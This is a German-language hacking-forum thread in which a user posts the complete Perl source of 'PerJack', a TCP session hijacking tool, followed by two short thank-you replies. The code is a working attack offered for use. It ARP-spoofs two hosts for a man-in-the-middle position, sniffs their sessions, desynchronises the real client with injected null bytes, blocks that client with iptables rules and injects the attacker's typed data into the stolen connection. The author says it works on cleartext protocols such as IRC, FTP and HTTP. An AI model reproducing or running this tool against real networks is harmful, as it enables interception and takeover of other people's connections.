Ergebnis 1 bis 3 von 3
  1. #1
    (*(void (*)()) sc)(); Avatar von Cheese
    Registriert seit
    25.12.2008
    Beiträge
    332

    Standard PerJack - Perl TCP Session Hijacker

    Vielleich kennen ja ein paar Leute mein Paper über TCP-Session-Hijacking (http://www.exploit-db.com/papers/11102) dort gab es leider einige Probleme mit dem da gezeigtem tool, deswegen hab ich mich dran gemacht selbst eins zu schreiben.

    Linux only, keine ahnung ob es irgendwie möglich ist das PCAP modul in Windows anständig in perl zu benutzen und packetfilter kann man dort gleich vergessen, deswegen just linux :>

    (genaue beschreibung im code)
    http://mycheese.org/stuff/perjack.pl.txt
    Code:
    #!/usr/bin/perl
    # PerJack
    # by Cheese
    
    =begin INFO
      
      PerJack is a TCP Session Hijack tool written in Perl. The tools I've
      tested don't worked anyway for me or got other problems like don't
      sending ACKs for incoming hijacked data. Then I discovered some
      interesting modules for Perl which i thought can handle the term of
      TCP session hijacking. PerJack got some parts that really are not
      optimal but are simple and work perfect, so in case of block packets
      from the original keeper of the connection it uses /sbin/iptables and
      so on.
      
     It requires following additional Perl modules, you should install them
      with CPAN. Run "cpan" and install with "install <packetname>"
        Net::Arp
        Net::RawIP
        Net::Pcap
        Net::Pcap::Easy
      
      The "iptables" programm is required, you may flush your forward
      rules after using PerJack, "iptables -F FORWARD".  
      In case of doing a Man-in-the-Middle attack "ip_forward" is used, the
      file to activate this should be located at "/proc/sys/ipv4/ip_forward"
      but the path can be changed at the start of the code.
      
      To run PerJack you have to specify an [A] and [B] host, [A] is the
      side of the connection you are going to steal [B] is the other side
      or if the real target is not in the subnet the gateway. Perjack first
      resolves the MAC addresses (if they are not specified at start), you
      should ping them first to cache the MAC's. Then it sends a spoofed
      ARP packet to start a man-in-the-middle attack. All sessions that are
      noticed are printed to the display, you have to choose the on you want
      to hijack by typing in the number. After that PerJack waits for another
      packet transferred from [A] to [B] in order to get a working SEQ / ACK.
      As soon a packet is found it will send 1024 bytes of 0x00 to [B], so
      the [A] host is desynchronised. Now everything you enter is send in
      the hijacked session. Incoming data is printed to the screen and
      answered with an ACK packet. The [A] host is blocked using iptables
      because he is able to reset the connection even if he is desynced.
      
    =end INFO
    =cut
    
    our $iptables    = "/sbin/iptables";
    our $ip_forward = "/proc/sys/net/ipv4/ip_forward";
    
    
    print q{
     myCheese.org                                               cheese@mymail.ch
    =============================================================================
               _________                   __
              |   ___   |                 |  |                   _ 
              |  |  /  / ____    _  ____  |  |  ____     _____  | |  _
              |  |_/  / / __ \  | |/ ___| |  | |____ \  |  ___| | | / /
              |   ___/ / /__\ \ |  /      |  |  ____| | | |     | |/ /
              |  |     | _____/ | |  __   |  | /  __  | | |     |   |
              |  |     \ \____  | | |  \__|  | | |__| |  \ \__  | |\ \
              |__|      \____/  |_|  \_______/ \______/   \___| |_| \_\  
                                                              by Cheese
                                   -=[ PerJack ]=-
                          -=[ Perl TCP Session Hijacker ]=-
    ==============================================================================
    }; sub usage { print q{
        Usage:   ./perjack.pl [OPTIONS]
    
      Options:   FLAG           DISCRIPTION                            DEFAULT
                 -i <iface>     Interface to use                       eth0
                 -a <ip>        IP address of the  first  target (A)   (required)
                 -b <ip>        IP address of the  second target (B)   (required)
                 -A <mac>       MAC address of the first  target (A)   (auto)
                 -B <mac>       MAC address of the second target (B)   (auto)
                 -x <mac>       MAC address of the attacker    (you)   (auto)
                 -s <seconds>   Sleeptime between "reARPing"           10
                 -n             No Man-in-the-Middle attack
                 -h             This help text
    
    }; exit; }
    
    use Net::ARP;
    use Net::RawIP;
    use Net::Pcap::Easy;
    use strict;
    use Getopt::Std;
    use threads;
    use threads::shared;
    use Switch;
    no warnings 'threads';
    
    
    if($< != 0){ die(" [!] Error: are you root?"); }
    our ($opt_a,$opt_b,$opt_A,$opt_B,$opt_x,$opt_h,$opt_i,$opt_s,$opt_n);
    getopts('a:b:A:B:x:h:i:s:n');
    if($opt_h || !$opt_a) { usage(); }
    
    (our $iface = $opt_i) ||= "eth0";
    print " [*] Using interface $iface.\n";
    
    our($a_ip) = $opt_a =~ m/((\d+)(\.\d+){3})/;
    if(length($a_ip)<7) { die(" [!] Error: bad IP address for target A"); } else { print " [*] Using $a_ip for target A.\n" }
    
    if(!$opt_n) {  
      our($b_ip) = $opt_b =~ m/((\d+)(\.\d+){3})/;
      if(length($b_ip)<7) { die(" [!] Error: bad IP address for target B"); } else { print " [*] Using $b_ip for target B.\n" }
      
      (our $my_mac = $opt_x) ||= Net::ARP::get_mac($iface);  #thx to 0x30
      our($my_mac) = $my_mac =~  m/(([0-9A-F]{2})(:[0-9A-F]{2}){5})/i;
      if(length($my_mac)!=17) { die(" [!] Error: bad mac address for attacker"); } else { print " [*] Using $my_mac as attacker mac address.\n"; }
      
      (our $a_mac = $opt_A) ||= Net::ARP::arp_lookup($iface,$a_ip);
      our($a_mac) = $a_mac =~ m/(([0-9A-F]{2})(:[0-9A-F]{2}){5})/i;
      if(length($a_mac) != 17) { die(" [!] Error: bad mac address for target A, ping him to cache mac address and try again."); } else { print " [*] Using $a_mac as target A mac address.\n" }
      
      (our $b_mac = $opt_B) ||= Net::ARP::arp_lookup($iface,$b_ip);
      our($b_mac) = $b_mac =~ m/(([0-9A-F]{2})(:[0-9A-F]{2}){5})/i;
      if(length($b_mac) != 17) { die(" [!] Error: bad mac address for target B, ping him to cache mac address and try again."); } else { print " [*] Using $b_mac as target B mac address.\n" }
    
      open FILE, "<", $ip_forward or die $!;
      if(<FILE> == 1) { print " [*] IP Forwarding already active.\n"; close FILE or die $!;} else {
        close FILE or die $!;
        print " [!] IP Forwarding seems off.\n";
        our $loop = 1;
        while($loop) {
          undef $loop;
          print " [!] Activate by writing '1' to '$ip_forward'? ([Y]es/[N]o/[I]gnore): ";
          switch(<STDIN>) {
            case m/^y/i {
              open FILE, ">", $ip_forward or die $!;
              print FILE 1;
              close FILE or die $!;
              open FILE, "<", $ip_forward or die $!;
              if(<FILE> == 1) { print " [*] IP Forwarding now active.\n"; close FILE or die $!;}
              else { die(" [!] Error: failed to activate IP Forwarding."); } 
            }
            case m/^n/i { exit; }
            case m/^i/i { print " [*] Continuing.\n"; }
            else { our $loop = 1; }
          } 
        }
      }
    
      (my $sleep = $opt_s) ||= 10;
      my($sleep) = $sleep =~ m/([0-9]*)/;
      if(length($sleep)<1) { die(" [!] Error: bad sleep time") } else { print " [*] Using $sleep seconds sleeptime.\n"; }
      
      print " [*] Sending ARP packets every $sleep seconds.\n";
      
      sub arp {
        while(1) {
          Net::ARP::send_packet($iface,$b_ip,$a_ip,$my_mac,$a_mac,'reply') or die (" [!] Error: problem sending ARP Packet");
          Net::ARP::send_packet($iface,$a_ip,$b_ip,$my_mac,$b_mac,'reply') or die (" [!] Error: problem sending ARP Packet");
          sleep($sleep);
        }
      }
      my $arp_thread = new threads \&arp;
    }
    
    print "\n [*] Enter the number of the session you want to hijack.\n";
    print " [*] Sessions:\n";
    
    ###
    # Sniffing for Connections
    
    my @sessions : shared;
    my $sessioncount : shared = 0;
    
    sub getsessions {
      $SIG{'KILL'} = sub { threads->exit(); };
      my $npe = Net::Pcap::Easy->new(
        dev              => $iface,
        filter           => "src host $a_ip and tcp",
        packets_per_loop => 10,
        bytes_to_capture => 1024,
        timeout_in_ms    => 0, # 0ms means forever
        promiscuous      => 0,
        tcp_callback => sub {
          my ($npe, $ether, $ip, $tcp) = @_;
          if($ip->{src_ip}!=$a_ip){ return; }
          foreach(@sessions) { if($_ eq "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}") { return; } }
          $sessions[$sessioncount] = "$ip->{src_ip}:$tcp->{src_port} --> $ip->{dest_ip}:$tcp->{dest_port}";
          print "    [$sessioncount] $sessions[$sessioncount]\n";
          $sessioncount++;
        }
      );
      1 while $npe->loop;
    }
    my $getsessions_thread = new threads \&getsessions;
    our $choice;
    our $loop = 1;
    while($loop) {
      $choice = <STDIN>;
      if($choice<$sessioncount) { undef $loop; }
    }
    $getsessions_thread->kill("KILL");
    our($h_src_ip,$h_src_port,$h_dst_ip,$h_dst_port) = $sessions[$choice] =~ m/^([0-9.]+):(\d+) --> ([0-9.]+):(\d+)$/;
    print "\n [*] Hijacking: $h_src_ip:$h_src_port --> $h_dst_ip:$h_dst_port\n";
    
    print " [*] Wait for packet to get seq and ack.\n";
    our($h_seq,$h_ack,$h_data);
    
    my $npe = Net::Pcap::Easy->new(
        dev              => $iface,
        filter           => "src host $h_src_ip and src port $h_src_port and dst host $h_dst_ip and dst port $h_dst_port and tcp",
        packets_per_loop => 1,
        bytes_to_capture => 1024,
        timeout_in_ms    => 0,
        promiscuous      => 0,
        tcp_callback => sub {
          my ($npe, $ether, $ip, $tcp) = @_;
          our($h_seq,$h_ack,$h_data) = ($tcp->{seqnum},$tcp->{acknum},$tcp->{data});
        }
    );
    $npe->loop;
    print " [*] SEQ: $h_seq, ACK: $h_ack\n";
    $h_seq += length($h_data);
    
    #send 1024 byte to desync real client
    sendrawpacket($h_src_ip,$h_dst_ip,$h_src_port,$h_dst_port,$h_seq,$h_ack,1,0,"\x00"x1024);
    $h_seq += 1024;
    
    #start tcp daemon to senc ack for incoming packets and print the incoming data
    my $tcpdaemon_thread = new threads \&tcpdaemon;
    
    system("$iptables -A FORWARD -s $h_src_ip -p tcp --sport $h_src_port -j DROP"); # this sucks like hell, but the real client is still able to RST connection if he trys to exit
    system("$iptables -A FORWARD -d $h_src_ip -p tcp --dport $h_src_port -j DROP");
    print " [*] Everything you enter is send through the hijacked session\n" . "-"x70 . "\n";
    
    #input loop
    while(1) {
      my $data = <stdin>;
      sendrawpacket($h_src_ip,$h_dst_ip,$h_src_port,$h_dst_port,$h_seq,$h_ack,1,0,$data);
      $h_seq += length($data);
    }
    
    
    
    ###
    # subroutines
    
    # TCP daeomon to answer packetes and print content
    sub tcpdaemon() {
        my $npe = Net::Pcap::Easy->new(
          dev              => $iface,
            filter           => "src host $h_dst_ip and src port $h_dst_port and dst host $h_src_ip and dst port $h_src_port and tcp",
          packets_per_loop => 1,
          bytes_to_capture => 1024,
          timeout_in_ms    => 0,
          promiscuous      => 0,
          tcp_callback => sub {
            my ($npe, $ether, $ip, $tcp) = @_;
              if($tcp->{seqnum} == $h_ack) {
              $h_seq = $tcp->{acknum};
                  if(length($tcp->{data}) > 0) {
                      $h_ack += length($tcp->{data});
                      sendrawpacket($h_src_ip,$h_dst_ip,$h_src_port,$h_dst_port,$h_seq,$h_ack,1,0,'');
                      syswrite(STDOUT,$tcp->{data});
                  }
            }
            }
        );
        1 while $npe->loop; 
    }
    
    # just send a single packet
    sub sendrawpacket() {
        my $n = Net::RawIP->new({
              ip  => {
                    saddr => shift,
                    daddr => shift,
                  },
                  tcp => {
                    source => shift,
                    dest   => shift,
                          seq    => shift,
                          ack_seq => shift,
                          ack    => shift,
                          rst    => shift,
                          data   => shift,
                  },
      });
        $n->send;
    }
    (Getestet mit NetCat chat, IRC, FTP, HTTP(xD). Sollte bei jedem klartext Protokoll gehen)
    Geändert von Cheese (19.02.2010 um 19:33 Uhr)
    [myCheese.org]

    << n0psl3d >>

  2. Folgende Benutzer haben sich für diesen Beitrag bedankt:

    GregorSamsa (19.02.2010)

  3. #2

    Standard

    Jop, echt schönes Script Cheese, hab mich nun mal mit dem Thema angefangen zu beschäftigen, wie im IRC gesagt xD
    _n0p3_

  4. #3
    print&lt;&gt;=~y/0-9//,$/ Avatar von 0x30
    Registriert seit
    01.02.2010
    Beiträge
    468

    Standard

    Schöne Arbeit und danke für das "thx"

Stichworte

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •